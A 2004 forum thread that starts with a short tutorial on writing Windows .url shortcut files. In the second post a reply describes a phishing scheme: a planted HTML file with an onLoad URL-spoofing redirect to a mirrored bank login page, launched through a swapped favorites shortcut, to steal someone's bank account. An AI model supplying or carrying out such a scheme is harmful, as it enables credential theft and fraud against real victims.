|
-
January 3rd, 2004, 02:18 PM
#1
Manually creating .url files {tutorial, sort off}
I had written this and put it on my website a while ago, thought I'd post it here.
I didn't post it in the tutorials forum because I don't think you can really consider it as a tutorial. If a mod does believe this is a tutorial please move it there...
This is easy and you can easily find it out by yourself, but
lame people have to exist too so I wrote this 
1. What is a .url file
------------------------
A URL file is like a shortcut, it opens your default
browser and displays the URL from within the URL file.
2. Create the damn thing
-------------------------------
Open up your favourite text editor (notepad, wordpad, word, edit,...)
The syntax is like:
[InternetShortcut]
URL=http://www.google.com
IconFile=C:\windows\system\url.dll
IconIndex=1
The value of URL is of course the URL you want it to point to.
IconFile is the icon you want to use.
IconIndex is only useful when you use an icon from a .dll file, if you want
to use the 2nd Icon from that dll file its value should be 2.
This is actually not very useful...Yet I wrote it...whatever
The above sentences are produced by the propaganda and indoctrination of people manipulating my mind since 1987, hence, I cannot be held responsible for this post\'s content - me
www.elhalf.com
-
January 3rd, 2004, 04:36 PM
#2
Member
This is actually not very useful...Yet I wrote it...whatever
That's where your wrong. Sometimes the littlest trick, can be the icing on a very big one.
Try using it in conjuction with something else.
Create an html file(c:\exploit.html) on a targets computer and insert this browser hack. Works on IE and some ver. of mozilla.
<BODY onLoad="location.href=unescape('http://www.microsoft.com%01@redhat.com');">
Insert FirstBank login for the first url and then mywebsite.com/hack (containing mirrored html content from the login screen) for the second one.
Next create the cute little url
[InternetShortcut]
URL=c:\exploit.html
IconIndex=1
replace the shortcut to the real url in the victims favorite folder and bingo you have somebody's bank account, or whatever. Of course it might be easier to use a keyboard logger in most cases, but it could be useful in certain situations.
[gloworange]
find /home/$newbie -name *? | www.google.com 2>/dev/null
[/gloworange]
-
January 3rd, 2004, 05:16 PM
#3
Yeah, I know it might be useful for cross site scripting and stuff, if you look at the original on my website, I mentioned that (www.elhalf.tk)...but still, most of the time you won't need it...
EDIT: seems lots of old members are returning...
The above sentences are produced by the propaganda and indoctrination of people manipulating my mind since 1987, hence, I cannot be held responsible for this post\'s content - me
www.elhalf.com
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|
Reply With Quote